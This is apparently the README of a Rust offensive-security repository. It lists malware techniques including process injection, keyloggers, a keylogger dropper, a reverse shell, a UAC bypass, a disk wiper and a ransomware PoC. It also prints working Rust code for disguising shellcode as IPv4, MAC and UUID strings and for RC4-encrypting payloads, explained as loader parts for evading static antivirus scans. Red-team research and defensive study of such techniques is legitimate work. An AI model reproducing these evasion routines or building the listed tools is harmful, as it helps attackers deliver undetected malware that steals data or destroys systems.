This repository contains source code for various techniques used by real-world malware authors, red teamers, threat actors, state-sponsored hacking groups, etc. The techniques are researched and implemented in Rust.
Repository managed by @5mukx
Note: These are my own research and implementations, derived from the original authors' work. If you discover any errors in this code, please contact me or contribute to this repository.
| Techniques | Description |
|---|---|
| Process Injection | Process injection techniques using Rust. |
| Process Injection 2 | A second set of process injection snippets. |
| Process Ghosting | Process Ghosting technique written in Rust. |
| Process Hypnosis | Process Hypnosis technique written in Rust. |
| Process Herpaderping | Process Herpaderping written in Rust. |
| NtCreateUserProcess | Launching a process with the NtCreateUserProcess API. |
| Named Pipes | Demonstrating IPC using named pipes on Windows. |
| BlockHandle | PoC that blocks handle access using an SDDL security descriptor. |
| Dynamic Export Table PEB | Calls Windows functions by locating them in memory via the PEB and module export tables rather than through the import table. |
| API Hammering | API hammering techniques. |
| Early Cascade Injection | Early-Cascade Injection PoC written in Rust. |
| Encryption Methods | Methods to encrypt and execute payloads (see the table below). |
| Enumeration | Enumeration modules to save your time. |
| Malware Samples | Malware written based on real-world activity. |
| Metadata Modification | Extract and embed custom metadata in a binary file. |
| Keyloggers | Custom keylogger implementations written in Rust. |
| DLL Injection | DLL injection in Rust. |
| Code Snippet | Snippets that help perform certain malware operations. |
| NTAPI Implementation | Code snippets using the ntapi crate. |
| Extract Wifi Passwords | Extract Wi-Fi passwords stored on Windows. |
| Reverse Shell Rust | Rust client/server reverse shell. |
| Thread Hijacking | Thread hijacking code snippet. |
| Self Delete | Techniques for a running binary to delete itself from disk. |
| Position Independent Series | Position-independent code series in Rust. |
| Shellcode Execution methods | Shellcode execution methods using Win32 APIs. |
| Sleep Obfuscation | Sleep obfuscation implementation in Rust. |
| Syscalls | Syscall implementation using system call stubs (direct and indirect methods). |
| BSOD | Causes a BSOD when executed. |
| Persistence | Persistence code snippets. |
| UAC Bypass CMSTP | Bypass UAC by elevating through CMSTP.exe. |
| Malware DSA | Implementing malware using DSA (Data Structures and Algorithms) concepts. |
| Shellcode Obfuscation | Obfuscate and deobfuscate shellcode by encoding it as IPv4, IPv6, MAC, and UUID strings. |
| EDR Checker | Checks for the presence of EDR tools, AV software, and other security-related applications on a Windows system. |
| Keylogger Dropper | Downloads a keylogger and its sender to the victim PC and executes them in the background. |
| Rand_Fill | A small parallel program that deletes all files on disk and fills the disk with random bytes, so that the original data cannot be recovered. |
| Encryfer-X | Ransomware PoC built by combining the PoC techniques above. |
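The Shellcode Obfuscation entry above refers to the trick of storing shellcode as a list of harmless-looking strings (IP addresses, MAC addresses, UUIDs) and parsing them back into bytes at runtime, so the raw byte pattern never appears in the binary's data section. The following is an added round-trip example, not the repository's own code: the encoders and decoders are written here from scratch, and the sample bytes are constructed (a familiar x64 stager prologue, not a working payload). One caveat a practitioner should know: if the Windows-side decoder is UuidFromStringA, the first three UUID groups land in memory little-endian, so an encoder targeting that API must byte-swap those groups; the pure-Rust decoder below does no swapping, so it is consistent only with its own encoder.

```rust
// Added example (not the repository's own code): shellcode obfuscation as
// IPv4 / MAC / UUID strings with matching decoders. This hides bytes from
// static pattern matching; it is not encryption.

/// Pad with 0x90 (NOP) up to a multiple of `n` so every chunk is full.
/// The caller keeps the original length and truncates after decoding.
fn pad(data: &[u8], n: usize) -> Vec<u8> {
    let mut v = data.to_vec();
    while v.len() % n != 0 {
        v.push(0x90);
    }
    v
}

/// 4 bytes per "a.b.c.d" string.
pub fn to_ipv4(sc: &[u8]) -> Vec<String> {
    pad(sc, 4)
        .chunks(4)
        .map(|c| format!("{}.{}.{}.{}", c[0], c[1], c[2], c[3]))
        .collect()
}

pub fn from_ipv4(list: &[String], len: usize) -> Result<Vec<u8>, String> {
    let mut out = Vec::new();
    for s in list {
        let parts: Vec<&str> = s.split('.').collect();
        if parts.len() != 4 {
            return Err(format!("bad IPv4 entry: {s}"));
        }
        for p in parts {
            out.push(p.parse::<u8>().map_err(|e| format!("{s}: {e}"))?);
        }
    }
    out.truncate(len);
    Ok(out)
}

/// 6 bytes per "AA-BB-CC-DD-EE-FF" string.
pub fn to_mac(sc: &[u8]) -> Vec<String> {
    pad(sc, 6)
        .chunks(6)
        .map(|c| c.iter().map(|b| format!("{b:02X}")).collect::<Vec<_>>().join("-"))
        .collect()
}

pub fn from_mac(list: &[String], len: usize) -> Result<Vec<u8>, String> {
    let mut out = Vec::new();
    for s in list {
        let parts: Vec<&str> = s.split('-').collect();
        if parts.len() != 6 {
            return Err(format!("bad MAC entry: {s}"));
        }
        for p in parts {
            out.push(u8::from_str_radix(p, 16).map_err(|e| format!("{s}: {e}"))?);
        }
    }
    out.truncate(len);
    Ok(out)
}

/// 16 bytes per "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" string, plain byte order.
/// Caveat: UuidFromStringA stores the first three groups little-endian; an
/// encoder feeding that API must swap those groups. This pair does not.
pub fn to_uuid(sc: &[u8]) -> Vec<String> {
    pad(sc, 16)
        .chunks(16)
        .map(|c| {
            let h: String = c.iter().map(|b| format!("{b:02x}")).collect();
            format!("{}-{}-{}-{}-{}", &h[0..8], &h[8..12], &h[12..16], &h[16..20], &h[20..32])
        })
        .collect()
}

pub fn from_uuid(list: &[String], len: usize) -> Result<Vec<u8>, String> {
    let mut out = Vec::new();
    for s in list {
        let h: String = s.chars().filter(|c| *c != '-').collect();
        if h.len() != 32 || !h.is_ascii() {
            return Err(format!("bad UUID entry: {s}"));
        }
        for i in (0..32).step_by(2) {
            out.push(u8::from_str_radix(&h[i..i + 2], 16).map_err(|e| format!("{s}: {e}"))?);
        }
    }
    out.truncate(len);
    Ok(out)
}

/// Constructed sample bytes (x64 stager prologue shape; not a working payload).
pub const SAMPLE: &[u8] = &[
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
    0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2,
];

fn main() {
    let ips = to_ipv4(SAMPLE);
    println!("as IPv4: {ips:?}");
    let back = from_ipv4(&ips, SAMPLE.len()).expect("decode");
    assert_eq!(back, SAMPLE);
    println!("as MAC:  {:?}", to_mac(SAMPLE));
    println!("as UUID: {:?}", to_uuid(SAMPLE));
}
```

The original length is passed to each decoder because the NOP padding added by `pad` would otherwise be executed as part of the payload; in a loader you would embed that length next to the string list.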
The Encryption Methods directory contains the following:
| Techniques | Description |
|---|---|
| AES Encryption | Encrypt and decrypt shellcode/payloads using AES. |
| RC4 Encryption | Encrypt and decrypt shellcode/payloads using RC4. |
| Khufu Encryption | Encrypt and decrypt using the Khufu algorithm. |
| Camellia Cipher | Encryption using the Camellia cipher. |
| NullxFigure | Simple program to parse null bytes in shellcode. |
| A5/1 Cipher | Encrypt shellcode using a modified A5/1 cipher with seeded randomness. |
| XOR Encryption | Shellcode encryption using XOR. |
| Lucifer Algorithm | Encrypt and decrypt shellcode using the Lucifer algorithm. |
| DFC Algorithm | Encrypt and execute payloads using the DFC algorithm. |
| Payload Shuffling | Payload shuffling techniques. |
| ECC Encryption | Encrypt and decrypt shellcode/payloads using ECC (Elliptic Curve Cryptography). |
| SystemFunction032/033 | Encrypt and decrypt shellcode using the undocumented advapi32 functions SystemFunction032/033 (RC4). |
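Both the RC4 Encryption entry and the SystemFunction032/033 entry in the table come down to the same cipher: SystemFunction032 and SystemFunction033 are undocumented advapi32 exports that run RC4 over a buffer. The block below is an added example, not the repository's own code: a pure-Rust RC4 that reproduces what those exports compute, plus a small helper that renders the encrypted bytes as a Rust array literal of the kind a loader embeds in its source. The key name and the sample bytes are constructed for the example.

```rust
// Added example (not the repository's own code): RC4 as a shellcode
// encrypt/decrypt routine. Encrypting and decrypting are the same call.

/// RC4: key-scheduling (KSA) then keystream generation (PRGA) XORed over `data`.
pub fn rc4(key: &[u8], data: &[u8]) -> Vec<u8> {
    assert!(!key.is_empty() && key.len() <= 256, "RC4 key must be 1..=256 bytes");
    // KSA: initialise the permutation and scramble it with the key.
    let mut s = [0u8; 256];
    for (i, v) in s.iter_mut().enumerate() {
        *v = i as u8;
    }
    let mut j: u8 = 0;
    for i in 0..256 {
        j = j.wrapping_add(s[i]).wrapping_add(key[i % key.len()]);
        s.swap(i, j as usize);
    }
    // PRGA: one keystream byte per input byte, XORed in.
    let (mut i, mut j) = (0u8, 0u8);
    data.iter()
        .map(|&b| {
            i = i.wrapping_add(1);
            j = j.wrapping_add(s[i as usize]);
            s.swap(i as usize, j as usize);
            b ^ s[s[i as usize].wrapping_add(s[j as usize]) as usize]
        })
        .collect()
}

/// Render bytes as a Rust array literal, the form a loader embeds in source.
pub fn as_rust_array(name: &str, bytes: &[u8]) -> String {
    let body: Vec<String> = bytes.iter().map(|b| format!("0x{b:02x}")).collect();
    format!("const {name}: [u8; {}] = [{}];", bytes.len(), body.join(", "))
}

/// Constructed sample bytes (not a working payload).
pub const PAYLOAD: &[u8] = &[0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00];

fn main() {
    // Hypothetical key chosen for the example; in practice it is derived or fetched at runtime.
    let key = b"s3cr3t-key";
    let enc = rc4(key, PAYLOAD);
    println!("{}", as_rust_array("ENC", &enc));
    // At runtime the loader makes the same call and gets the original bytes back.
    assert_eq!(rc4(key, &enc), PAYLOAD);
    println!("round trip ok");
}
```

RC4 here only keeps the payload's byte pattern out of static scans; the key sits in the same binary, so this is obfuscation, not confidentiality, and a sandbox that runs the loader sees the plaintext in memory. The test vectors used to check the implementation are the standard published RC4 vectors ("Key"/"Plaintext", "Wiki"/"pedia", "Secret"/"Attack at dawn").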
Click Here to download the Repository: Download
Manifest dependencies for winapi, needed to build and run the PoCs. Copy them into your Cargo.toml file:

```toml
[dependencies]
winapi = { version = "0.3.9", features = ["winuser", "setupapi", "dbghelp", "wlanapi", "winnls", "wincon", "fileapi", "sysinfoapi", "fibersapi", "debugapi", "winerror", "wininet", "winhttp", "synchapi", "securitybaseapi", "wincrypt", "psapi", "tlhelp32", "heapapi", "shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi"] }
ntapi = "0.4.1"
```

Tip for Rust beginners: copy and save these dependencies in your Cargo.toml file. The crate versions may differ from what cargo resolves on your machine; when testing, keep the feature list as-is and adjust only the version numbers.
- New to Rust? Follow the steps here: Compile
- How to compile the source code in this repository: README
- How to clean all the PoCs recursively: Commands
- Cross compilation using Docker: README
If you need an exploit or proof-of-concept (PoC) removed, please contact me via email at [email protected] or through my Twitter handle @5mukx.